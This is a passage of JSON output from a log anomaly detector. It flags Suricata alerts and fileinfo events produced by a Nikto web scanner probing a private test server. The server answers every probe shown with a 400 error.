"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46844, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":212665289573775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 212665289573775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46846 -> 192.168.10.154:80", "/parser/model/time": 1583349514.233219, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46846, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46846 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.EXE", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.233382, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46846, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1641910146599993, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" 
], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80", "/parser/model/time": 1583349514.235199, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46848, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ 
"\\/bISn4adA.java", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.235367, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.java", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.java", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46848, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1729286961271675, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80", "/parser/model/time": 1583349514.236933, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46850, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.conf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.237117, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":656541569686162,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
